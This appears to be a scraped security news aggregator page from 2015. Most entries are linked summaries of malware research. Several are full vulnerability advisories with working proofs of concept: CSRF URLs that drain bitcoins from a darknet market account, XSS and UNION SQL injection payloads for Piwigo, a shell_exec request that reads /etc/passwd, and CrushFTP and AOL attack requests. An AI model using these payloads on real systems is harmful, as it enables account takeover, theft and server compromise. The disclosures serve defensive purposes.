Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Windows: CreateProcessAsUser Impersonation Token Bypass

February 18, 2015, 2:27 am
$
0
0
The CreateProcessAsUser function is implemented by passing a token handle via a special Attribute (value 0x60002) to the underlying NtCreateUserProcess system call. All documentation indicates that this handle should be a primary token, the CreateProcessAsUser function will attempt to duplicate the token if necessary to make a primary token. The particular issue in this case is the NtCreateUserProcess and the functions it calls, such as PspReferenceTokenForNewProcess and SeAssignPrimaryToken never verify that it is a primary token. The only requirement on the token is the handle is opened with TOKEN_ASSIGN_PRIMARY_TOKEN privilege, which any impersonation token is granted.

more here..........https://code.google.com/p/google-security-research/issues/detail?id=198
Search

Whitelisting goes wrong

February 18, 2015, 2:30 am
$
0
0
Last December, I did testing on one of the client's web application. Going to share one of the findings that for me quite interesting.

This application used purposely for state mapping service. A user can view the updated geoportal on their state by browsing to this application.


more here...........http://c0rni3sm.blogspot.com/2015/02/whitelisting-goes-wrong.html

[ TECHNICAL ANALYSIS: SCOOP.APK ]

February 18, 2015, 2:33 am
$
0
0
I started to write about this particular malware before Christmas in 2014 but it was left sitting in the draft for so long until i decided to take a break from #EquationAPT today. It all started when i got a sms

more here..........http://www.vxsecurity.sg/2015/02/18/technical-analysis-scoop-apk/

Another hunting post

February 18, 2015, 2:37 am
$
0
0
I often see statements like “people need to know their network like the back of their hand to be able to identify evil”. While I don’t disagree with this, I think there are many other things that people should be just as familiar with. Sally’s machine in finance may not always scan Jim’s machine in R&D and the clues to identifying a compromise may be much more subtle. It’s these subtle indicators that we can use to hunt for adversary activity.

more here........http://blog.handlerdiaries.com/?p=775

Shooting Elephants: (Analysis of French Government Spyware Known As Babar Which Steals Data from Instant Messengers, Softphones, Browsers and Office Applications)

February 18, 2015, 3:32 am
$
0
0
Subject of this analysis is a fascinating piece of malware, which invades Windows desktop
machines and aims at..well, all the things. The analyzed malware consists of a dropper and an
implant, which invades windows processes to steal data from instant messengers, softphones,
browsers and office applications. A fully blown espionage kit, so to say, sophisticated almost.
The implant is able to hook APIs of interest in dedicated remote processes, to steal data on the fly.

More interesting than the malware itself though, is the path to the associated symbol file, which appears embedded in the dropper.

more here...........https://drive.google.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/view?pli=1


and article on the topic by Motherboard here...http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france

Angry Android hacker hides Xbot malware in popular application icons

February 18, 2015, 4:39 am
$
0
0
In the past few weeks, the Avast Mobile Security analysts have been focusing on Android malware which targets users in Russia and Eastern Europe. One of the families that caught our interest was the Xbot malware.

The name Xbot comes from the sample itself as the string Xbot was found in all variants of this malware. Xbot uses a variety of names and package names but this string was, with different levels of obfuscation, in every single file we analyzed so we decided to name the malware after it.

more here.......https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/

Did GCHQ illegally spy on you? Here’s how to find out

February 18, 2015, 5:07 am
$
0
0
Want to know if UK intelligence agency GCHQ has been covertly spying on you? Now here’s your chance.
Surveillance and privacy watchdog Privacy International has launched an initiative to help people discover if their internet activity and private communications were secretly and illegally spied upon by British intelligence outfit, GCHQ.

more here.........http://www.welivesecurity.com/2015/02/17/gchq-illegally-spy/

Agora Marketplace CSRF to Steal Bitcoins (agorahooawayyfoe.onion)- The Guardians of Peace Aims to Disclose Vulnerabilities in Onion Land

February 18, 2015, 5:33 am
$
0
0
Ladies and gentlemen
Boys and girls
It come to our attention that a brave warrior for the people Ross
William Ulbricht was unlawfully convicted by the corporation known as
the American government.

This mockery of justice has not gone unnoticed.

In order to protect the next generation of darknet markets we will be
disclosing vulnerabilities for these sites in order to make these
sites safer from attack.

To start, the Agora Marketplace contains a CSRF vulnerability which
can be used to drain a victim account of all of their Bitcoins. The
following URLs can be used to perform this attack:

URL to start PIN reset:
http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=

URL to change current PIN:
http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save

URL to send bitcoins using the new pin:
http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send

These are all GET requests and don't require JavaScript to work.
NoScript cannot save you from poor coding practices.

There will be more to come. Stay safe. Stay anonymous.

-The Guardians of Peace

Email: agoraagoraagora@hushmail.com
Search

Crushftp 7.2.0 - Multiple CSRF & XSS Vulnerabilities

February 18, 2015, 5:37 am
$
0
0
========================================================
 I. Overview
 ========================================================
 Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified in
Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities allows
 an attacker to gain control over valid user accounts, perform operations
 on their behalf, redirect them to malicious sites, steal their credentials,
 and more.
 ========================================================
 II. Severity
 ========================================================
 Rating: Medium
 Remote: Yes
 Authentication Require: Yes
 ========================================================
 III. Vendor's Description of Application
 ========================================================
CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users.
'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream,
or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate
the transfer of many types of files.
Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device.
Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI.
CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically
protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage.
This keeps your server secure from unwanted abuse.
User management includes inheritance, groups, and virtual file systems. If you want simple user management,
it can be as easy as just making a folder with a specific name and nothing else.
Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration.
http://www.crushftp.com/index.html

 ========================================================
 IV. Vulnerability Details & Exploit
 ========================================================

 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config)

 a) An attacker may add/delete/modify user's accounts
 b) May change all configuration settings

Request Method: POST
Location: /WebInterface/fuction/

Proof of Concept:-


















2) Multiple Cross-Site Scripting (Web Interface - Default Config)

Type: Reflected
Request Method: POST
Location: /WebInterface/function/
Parameter: vfs_items
Values:
vfs_items =


Proof of Concept:

POST /WebInterface/function/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html
Content-Length: 656
Cookie: XXXXXXXXXXXXXXXXXXXXX
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E


Type: Reflected
Request Method: GET
Location: /WebInterface/function/
Parameter: path
Values:



Authored by Rehan Ahmed 
Email: knight_rehan@hotmail.com

Tracking down a segfault in grep

February 18, 2015, 5:43 am
$
0
0
I was happily tooling around on my macbook at the command line, poking around in the MAME source code as you do, and then this happened:

$ grep -f pats listing
704 ./powerpc
724 ./m68000
872 ./i386
1092    ./upd7810
Segmentation fault: 11

Record scratching sound. WTF.

more here............http://blog.loadzero.com/blog/tracking-down-a-segfault-in-grep/

Multiple vulnerabilities on GLPI

February 18, 2015, 7:30 am
$
0
0
Multiple vulnerabilities have been identified in GLPI (http://www.glpi-project.org).

1/ Arbitrary file upload
Severity: Important

Versions Affected
===========
All versions between 0.85 and 0.85.2

Description
=======
When an user wants to create a new ticket, he has the possibility to add an attachment. If for example he wants to add a file named "test.php" with or without adding the ticket, the file will be temporary uploaded to GLPI_ROOT/files/_tmp/test.php. We can then directly access this file through http://host/GLPI_ROOT/files/_tmp/test.php and by default the php code will be interpreted.

To trigger this vulnerability we need an account that disposes of the rights to create a ticket.

This vulnerability is a combination of three issues:
- predictable uploaded file names (not randomized)
- upload of unauthorized file extensions
- temporary uploaded files not deleted if using an unauthorized file extension.

Impact
=====
By uploading a php file that will be interpreted a malicious user would be able to execute arbitrary code on the server.

Mitigation
======
Upgrade to GLPI 0.85.3 (https://forge.indepnet.net/issues/5217)


==========


2/ Privilege escalation
Severity: Important

Versions Affected
===========
All versions <= 0.85.2

Description
=======
Taking the default account tech, he is only allowed to add users in the following groups: Self-Service, Technician. He has not the right over, for example, the super-admin group. So he cannot add the super-admin privileges to an  existing user.

The problem is when creating a new user. When intercepting the POST request (GLPI_ROOT/front/user.form.php) of a user creation and modifying the _profiles_id parameter (corresponding to the group attached to the user) to 4, the new user will have the super-admin privileges.

Impact
=====
Any user who has the rights to create a new user can create a super-admin user.

Mitigation
======
Upgrade to GLPI 0.85.3 (https://forge.indepnet.net/issues/5218)

Regards,
--
Peter STIEHL

Use-After-Free in VLC 2.1.x

February 18, 2015, 7:38 am
$
0
0
tldr; I found a vulnerability in VLC while creating a training course on fuzzing. I reported it to the VLC maintainers but they declined to fix it. I contend it’s a security vulnerability. Here is the evidence, you decide.

more here...........http://theelectronjungle.com/2015/02/15/use-after-free-in-vlc-2.1.x/

Reflected File Download in AOL Search Website

February 18, 2015, 7:40 am
$
0
0
Oren Hafif reported a new kind of attack called Reflected File Download (
https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-new-web-attack-vector)
in Black Hat Europe 2014 conference.
More details about the attack you can found in his public presentation:
https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
.
Google and Bing have already fixed the vulnerability but I've found the
same vulnerability in AOL Search Website.
A malicious user could send the link below to a victim that you download a
malicious batch file from autocomplete.search.aol.com domain.
In the link below we have search for 'iramar "||calc||' using the AOL
autocomplete domain. The browser will encode the double quotes but the
server will escape it (\") and return inside the json on the body response.
Since the response has the header "Content-Type:
application/x-suggestions+json;charset=UTF-8" the browser will
automatically try to download the reflected file. Chrome didn't try to
download the file but Internet Explorer and Firefox will.

http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar"||calc||&it=ws-landing&dict=en_us_search&count=8&output=json

REQUEST

GET http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=
*iramar%22||calc||*&it=ws-landing&dict=en_us_search&count=8&output=json
HTTP/1.1
Host: autocomplete.search.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ...
Connection: keep-alive


RESPONSE

HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 10:30:34 GMT
Server: Apache-Coyote/1.1
*Content-Type: application/x-suggestions+json;charset=UTF-8*
Content-Language: en-US
Content-Length: 24
Keep-Alive: timeout=5, max=10
Connection: Keep-Alive

["iramar\"||calc||", []]


Displaying 1.png



Displaying 2.png

More on Babar: espionage software finally found and put under the microscope by G DATA

February 18, 2015, 7:44 am
$
0
0
Almost a year after Operation SNOWGLOBE was publicly mentioned for the first time by the famous French newspaper Le Monde, security experts have now laid hands on malware samples that match the descriptions made by the Communication Security Establishment Canada (CSEC). The following analysis is the first report about the espionage malware dubbed Babar, which the whole computer security community searched for. After the disclosure about EvilBunny [1], Babar is now a second component identified to be related to Operation SNOWGLOBE and is believed to be coded by the same developers. Babar’s feature set includes keystroke logging, clipboard logging and, most interesting, the possibility to log audio conversations – the elephant has big ears!

more here.........https://blog.gdatasoftware.com/blog/article/babar-espionage-software-finally-found-and-put-under-the-microscope.html

Initially Posted A Little Less Than a Year Ago "An Exploration of ARM TrustZone Technology" Is A Good Technical Read

February 18, 2015, 7:51 am
$
0
0
ARM TrustZone technology has been around for almost a decade. It was introduced at a time when the controversial discussion about trusted platform-modules (TPM) on x86 platforms was in full swing (TCPA, Palladium). Similar to how TPM chips were meant to magically make PCs "trustworthy", TrustZone aimed at establishing trust in ARM-based platforms. In contrast to TPMs, which were designed as fixed-function devices with a predefined feature set, TrustZone represented a much more flexible approach by leveraging the CPU as a freely programmable trusted platform module. To do that, ARM introduced a special CPU mode called "secure mode" in addition to the regular normal mode, thereby establishing the notions of a "secure world" and a "normal world".

more here.........http://genode.org/documentation/articles/trustzone
Search

Reflecting XSS- and SQL injection-vulnerabilities in the administrative backend of Piwigo

February 18, 2015, 7:52 am
$
0
0
Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <=
v. 2.7.3
Advisory ID: SROEADV-2015-06
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
Vendor URL: http://piwigo.org
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its
administrative backend.

==================
Technical Details:
==================

The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:

http://{TARGET}/admin.php?page=plugin-AdminTools

Exploit-Example:

http://
{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E

The SQL injection vulnerability can as well be found in the administrative
backend and can be found in the "History" functionality located here:

http://{TARGET}/admin.php?page=history

The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":

Exploit-Example:

POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
pwg_id=19rpao6bhdsn3l0u0o1im4m680;
_pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)
AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --
&image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit

=========
Solution:
=========

Install the latest version 2.7.4 (released 17th February 2015).


====================
Disclosure Timeline:
====================
08-Jan-2015 – found the vulnerability
09-Jan-2015 - informed the developers
09-Jan-2015 – release date of this security advisory [without technical
details]
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
17-Feb-2015 - release date of this security advisory
17-Feb-2015 - send to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://piwigo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
[3] http://piwigo.org/forum/viewtopic.php?id=25179

PHP Code Execution in jui_filter_rules Parsing Library

February 18, 2015, 7:53 am
$
0
0
PHP Code Execution in jui_filter_rules Parsing Library
======================================================
Researcher: Timo Schmid <tschmid@ernw.de>


Description
===========
jui_filter_rules[1] is a jQuery plugin which allows users to generate a
ruleset
which could be used to filter datasets inside a web application.

The plugin also provides a PHP library to turn the user submitted
ruleset into
SQL where statements for server side filtering.
This PHP library contains a feature which allows to convert the
submitted filter
values with server side functions. These functions can be specified
within the
ruleset, which leads to an arbitrary PHP code execution.


Exploitation Technique
======================
Remote


Severity Level
==============
Critical


CVSS Base Score
===============
6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)


CVE-ID
======
<unassigned>


Impact
======
By using the provided rule parsing library to generate SQL statements, an
attacker is capable of executing arbitrary PHP code in the context of the
web server. This could lead to a full compromise of the web server. The
attack vector could be limited by existing validation mechanisms around the
library, but this would require a partial manual parsing of the user
supplied
rules.


Status
======
Reported


Vulnerable Code Section
=======================
server_side/php/jui_filter_rules.php:
[...]
private function create_filter_value_sql($filter_type, $operator_type, ...
[...]
    if(is_array($filter_value_conversion_server_side)) {
        $function_name =
$filter_value_conversion_server_side['function_name'];
        $args = $filter_value_conversion_server_side['args'];
        $arg_len = count($args);
        for($i = 0; $i < $vlen; $i++) {
            // create arguments values for this filter value
            $conversion_args = array();
            for($a = 0; $a < $arg_len; $a++) {
                if(array_key_exists('filter_value', $args[$a])) {
                    array_push($conversion_args, $a_values[$i]);
                }
                if(array_key_exists('value', $args[$a])) {
                    array_push($conversion_args, $args[$a]['value']);
                }
            }
            // execute user function and assign return value to filter value
            try {
                $a_values[$i] = call_user_func_array($function_name,
$conversion_args);
            } catch(Exception $e) {
                $this->last_error = array(
                    'element_rule_id' => $element_rule_id,
                    'error_message' => $e->getMessage()
                );
                break;
            }
        }
    }
[...]

The provided PHP parsing library allows to specify a PHP function to convert
the supplied filter value on the server side. This leads ultimatively to
code
execution through attacker supplied input. As no whitelist approach is used,
any existing PHP function could be executed (including shell commands).


Proof of Concept
================
Using the demo application from the git repository:

Executing shell_exec('cat /etc/passwd')

Request:
POST /ajax_create_sql.dist.php HTTP/1.0
host: http://www.example.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 471

a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she
ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte
r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas
swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_
ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco
ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d
ate

Response:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 02:12:33 GMT
Server: Apache/2.2.22 (Debian)
Content-Length: 530
Content-Type: text/html

{"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin
COSMOS:/root:/
bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns
ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga
mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va
r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s
pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr
oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"}



Solution
========
This functionality should generally be removed or replaced by a mapping/
whitelist approach and strict type filtering to prevent arbitrary code
execution.


Affected Versions
=================
>= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
< 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)


Timeline
========
2015-01-12: Vulnerability found
2015-01-13: Developer informed
2015-02-14: Fixed in version 1.0.6 (git
0b61463cd02cc1814046b516242779b29ba7d1e1)


References
==========
[1] http://www.pontikis.net/labs/jui_filter_rules
[2] https://www.owasp.org/index.php/Code_Injection
[3] https://www.ernw.de/download/BC-1501.txt
[4] https://bufferoverflow.eu/BC-1501.txt


Advisory-ID
===========
BC-1501


Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

- --
Timo Schmid

ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0

Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================

Onion.city - a search engine bringing the Dark Web into the light

February 18, 2015, 9:10 am
$
0
0
The Dark Web is reflecting a little more light these days.
more here......https://nakedsecurity.sophos.com/2015/02/18/onion-city-a-search-engine-bringing-the-dark-web-into-the-light/

Paper: EdgeMiner: Automatically Detecting Implicit Control Flow Transitions through the Android Framework

February 18, 2015, 9:55 am
$
0
0
Abstract—A wealth of recent research proposes static data flow analysis for the security analysis of Android applications. One of the building blocks that these analysis systems rely upon is the computation of a precise control flow graph. The callback mechanism provided and orchestrated by the Android framework makes the correct generation of the control flow graph a challenging endeavor. From the analysis’ point of view, the invocation of a callback is an implicit control flow transition facilitated by the framework. Existing static analysis tools model callbacks through either manually curated lists or ad-hoc heuristics. This work demonstrates that both approaches are
insufficient, and allow malicious applications to evade detection by state-of-the-art analysis systems.

To address the challenge of implicit control flow transitions (i.e., callbacks) through the Android framework, we are the first to propose, implement, and evaluate a systematic treatment of
this aspect. Our implementation, called EdgeMiner, statically analyzes the entire Android framework to automatically generate API summaries that describe implicit control flow transitions through the Android framework. We use EdgeMiner to analyze three major versions of the Android framework. EdgeMiner identified 19,647 callbacks in Android 4.2, suggesting that a manual treatment of this challenge is likely infeasible. Our evaluation demonstrates that the current insufficient treatment of callbacks in state-of-the-art analysis tools results in unnecessary imprecision.

more here..........http://www.edgeminer.org/

Top Adult Site RedTube Compromised, Redirects to Malware

February 18, 2015, 12:32 pm
$
0
0
We’ve documented adult sites leading to malware before on this blog, but this one is a little bit different.

This time around, the source of the problem is not malvertising, but rather a malicious iframe placed directly in the source code of redtube[dot]com, a pornographic site that boasts over 300 million visits a month.

more here..........https://blog.malwarebytes.org/exploits-2/2015/02/top-adult-site-redtube-compromised-redirects-to-malware/
Viewing all 8064 articles
Browse latest View live
Search